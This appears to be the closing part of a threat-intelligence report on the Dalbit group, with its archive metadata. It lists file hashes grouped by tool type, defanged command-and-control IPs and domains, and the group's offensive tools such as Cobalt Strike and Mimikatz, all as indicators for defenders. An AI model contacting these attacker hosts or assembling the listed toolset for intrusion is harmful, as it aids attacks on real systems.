WebShell\r\n0359a857a22c8e93bc43caea07d07e23\r\n85a6e4448f4e5be1aa135861a2c35d35\r\n4fc81fd5ac488b677a4c0ce5c272ffe3\r\nc0452b18695644134a1e38af0e974172\r\n6b4c7ea91d5696369dd0a848586f0b28\r\n96b23ff19a945fad77dd4dd6d166faaa\r\n88bef25e4958d0a198a2cc0d921e4384\r\nc908340bf152b96dc0f270eb6d39437f\r\n2c3de1cefe5cd2a5315a9c9970277bd7\r\ne5b626c4b172065005d04205b026e446\r\n27ec6fb6739c4886b3c9e21b6b9041b6\r\n612585fa3ada349a02bc97d4c60de784\r\n21c7b2e6e0fb603c5fdd33781ac84b8f\r\nc44457653b2c69933e04734fe31ff699\r\ne31b7d841b1865e11eab056e70416f1a\r\n69c7d9025fa3841c4cd69db1353179cf\r\nfca13226da57b33f95bf3faad1004ee0\r\naf002abd289296572d8afadfca809294\r\ne981219f6ba673e977c5c1771f86b189\r\nf978d05f1ebeb5df334f395d58a7e108\r\ne3af60f483774014c43a7617c44d05e7\r\nc802dd3d8732d9834c5a558e9d39ed37\r\n07191f554ed5d9025bc85ee1bf51f975\r\n61a687b0bea0ef97224c7bd2df118b87\r\n…(omitted)\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 13 of 16\n\n– Privilege Escalation\r\n9fe61c9538f2df492dff1aab0f90579f\r\nab9091f25a5ad44bef898588764f1990\r\n87e5c9f3127f29465ae04b9160756c62\r\nab9091f25a5ad44bef898588764f1990\r\n4bafbdca775375283a90f47952e182d9\r\n0311ee1452a19b97e626d24751375652\r\nacacf51ceef8943f0ee40fc181b6f1fa\r\n3cbea05bf7a1affb821e379b1966d89c\r\n10f4a1df9c3f1388f9c74eb4cdf24e7c\r\nb5bdf2de230722e1fe63d88d8f628ebc\r\nedb685194f2fcd6a92f6e909dee7a237\r\ne9bd5ed33a573bd5d9c4e071567808e5\r\nfbae6c3769ed4ae4eccaff76af7e7dfe\r\n937435bbcbc3670430bb762c56c7b329\r\nfd0f73dd80d15626602c08b90529d9fd\r\n29274ca90e6dcf5ae4762739fcbadf01\r\n784becfb944dec42cccf75c8cf2b97e3\r\n7307c6900952d4ef385231179c0a05e4\r\nbcfca13c801608a82a0924f787a19e1d\r\n75fe1b6536e94aaee132c8d022e14f85\r\nd6cb8b66f7a9f3b26b4a98acb2f9d0c5\r\n323a36c23e61c6b37f28abfd5b7e5dfe\r\n7b40aa57e1c61ecd6db2a1c18e08b0af\r\n3665d512be2e9d31fc931912d5c6900e\r\n– Network Scan\r\n1aca4310315d79e70168f15930cc3308\r\n5e0845a9f08c1cfc7966824758b6953a\r\n9b0e4652a0317e6e4da66f29a74b5ad7\r\nd8d36f17b50c8a37c2201fbb0672200a\r\nb998a39b31ad9b409d68dcb74ac6d97d\r\nd5054ed83e63f911be46b3ff8af82267\r\ne7b7bf4c2ed49575bedabdce2385c8d5\r\nf01a9a2d1e31332ed36c1a4d2839f412 \r\nd4d8c9be9a4a6499d254e845c6835f5f\r\n– FRP\r\n4eb5eb52061cc8cf06e28e7eb20cd055\r\n0cc22fd05a3e771b09b584db0a161363\r\n8de8dfcb99621b21bf66a3ef2fcd8138\r\ndf8f2dc27cbbd10d944210b19f97dafd\r\n2866f3c8dfd5698e7c58d166a5857e1e\r\ncbee2fd458ff686a4cd2dde42306bba1\r\n3dc8b64b498220612a43d36049f055ab\r\n31c4a3f16baa5e0437fdd4603987b812\r\nb33a27bfbe7677df4a465dfa9795ff4a\r\n7d9c233b8c9e3f0ea290d2b84593c842\r\nc4f18576fd1177ba1ef54e884cb7a79d\r\n5d33609af27ea092f80aff1af6ddf98d\r\n622f060fce624bdca9a427c3edec1663\r\n1f2432ec77b750aa3e3f72c866584dc3\r\nd331602d190c0963ec83e46f5a5cd54a\r\n21d268341884c4fc62b5af7a3b433d90\r\n  – FRP_INI\r\n6a20945ae9f7c9e1a28015e40758bb4f\r\na29f39713ce6a92e642d14374e7203f0\r\n7ce988f1b593e96206a1ef57eb1bec8a\r\nfc9abba1f212db8eeac7734056b81a6e\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 14 of 16\n\n9f55b31c66a01953c17eea6ace66f636\r\n33129e959221bf9d5211710747fddabe\r\n48b99c2f0441f5a4794afb4f89610e48\r\n28e026b9550e4eb37435013425abfa38\r\n2ceabffe2d40714e5535212d46d78119\r\nc72750485db39d0c04469cd6b100a595\r\n68403cc3a6fcbeb9e5e9f7263d04c02f\r\n52ff6e3e942ac8ee012dcde89e7a1116\r\nd82481e9bc50d9d9aeb9d56072bf3cfe\r\n22381941763862631070e043d4dd0dc2\r\n6b5bccf615bf634b0e55a86a9c24c902\r\n942d949a28b2921fb980e2d659e6ef75\r\n059d98dcb83be037cd9829d31c096dab\r\ncca50cdd843aa824e5eef5f05e74f4a5\r\nf6f0d44aa5e3d83bb1ac777c9cea7060\r\n0ca345bc074fa2ef7a2797b875b6cd4d\r\nf6da8dc4e1226aa2d0dabc32acd06915\r\n0bbfaea19c8d1444ae282ff5911a527b\r\n – LCX\r\na69d3580921ec8adce64c9b38ac3653a\r\nc4e39c1fc0e1b165319fa533a9795c44\r\nfb6bf74c6c1f2482e914816d6e97ce09\r\n678dbe60e15d913fb363c8722bde313d\r\n  – Proxies etc.\r\ne0f4afe374d75608d604fbf108eac64f\r\n f5271a6d909091527ed9f30eafa0ded6\r\n ae8acf66bfe3a44148964048b826d005\r\n – Lateral Movement\r\n6983f7001de10f4d19fc2d794c3eb534\r\nfcb7f7dab6d401a17bd436fc12a84623\r\n – Information Collection and Credential Theft\r\nbb8bdb3e8c92e97e2f63626bc3b254c4\r\n80f421c5fd5b28fc05b485de4f7896a1\r\na03b57cc0103316e974bbb0f159f78f6\r\n46f366e3ee36c05ab5a7a319319f7c72\r\n7bd775395b821e158a6961c573e6fd43\r\n b434df66d0dd15c2f5e5b2975f2cfbe2\r\n c17cfe533f8ce24f0e41bd7e14a35e5e\r\n  – Backdoor\r\n011cedd9932207ee5539895e2a1ed60a\r\nbc744a4bf1c158dba37276bf7db50d85\r\n23c0500a69b71d5942585bb87559fe83\r\n53271b2ab6c327a68e78a7c0bf9f4044\r\nc87ac56d434195c527d3358e12e2b2e0\r\nC2 and URL (Abused Korean company servers are not listed)\r\n– Download C2\r\n91.217.139[.]117\r\n– Upload C2\r\n205.185.122[.]95\r\n91.217.139[.]117\r\n– FRP \u0026 LCX C2\r\nhxxp://sk1.m00nlight[.]top:80 (45.136.186.19) //MOACK_Co_LTD company server\r\nhxxps://fk.m00nlight[.]top:443 (45.136.186.175:443) //MOACK_Co_LTD company server\r\nhxxps://aa.zxcss[.]com:443 (45.93.31.122) //MOACK_Co_LTD company server\r\n45.93.31[.]75:7777 //MOACK_Co_LTD company server\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 15 of 16\n\n45.93.28[.]103:8080 //MOACK_Co_LTD company server\r\n103.118.42[.]208\r\n101.43.121[.]50\r\n– Backdoor C2\r\n45.93.31[.]75 //MOACK_Co_LTD company server\r\nSubscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed\r\nanalysis information.\r\nSource: https://asec.ahnlab.com/en/47455/\r\nhttps://asec.ahnlab.com/en/47455/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/47455/"
	],
	"report_names": [
		"47455"
	],
	"threat_actors": [
		{
			"id": "bcf899bb-34bb-43e1-929d-02bc91974f2a",
			"created_at": "2023-02-18T02:04:24.050644Z",
			"updated_at": "2026-04-10T02:00:04.639142Z",
			"deleted_at": null,
			"main_name": "Dalbit",
			"aliases": [],
			"source_name": "ETDA:Dalbit",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agentemis",
				"AntSword",
				"BadPotato",
				"BlueShell",
				"CHINACHOPPER",
				"China Chopper",
				"Cobalt Strike",
				"CobaltStrike",
				"EFSPotato",
				"FRP",
				"Fast Reverse Proxy",
				"Godzilla",
				"Godzilla Loader",
				"HTran",
				"HUC Packet Transmit Tool",
				"JuicyPotato",
				"LadonGo",
				"Metasploit",
				"Mimikatz",
				"NPS",
				"ProcDump",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"RottenPotato",
				"SinoChopper",
				"SweetPotato",
				"cobeacon",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7cf4ec85-806f-4fd7-855a-6669ed381bf5",
			"created_at": "2023-11-08T02:00:07.176033Z",
			"updated_at": "2026-04-10T02:00:03.435082Z",
			"deleted_at": null,
			"main_name": "Dalbit",
			"aliases": [],
			"source_name": "MISPGALAXY:Dalbit",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434076,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/47b8da3bea0c3580d92023398518498a0e33c21a.pdf",
		"text": "https://archive.orkl.eu/47b8da3bea0c3580d92023398518498a0e33c21a.txt",
		"img": "https://archive.orkl.eu/47b8da3bea0c3580d92023398518498a0e33c21a.jpg"
	}
}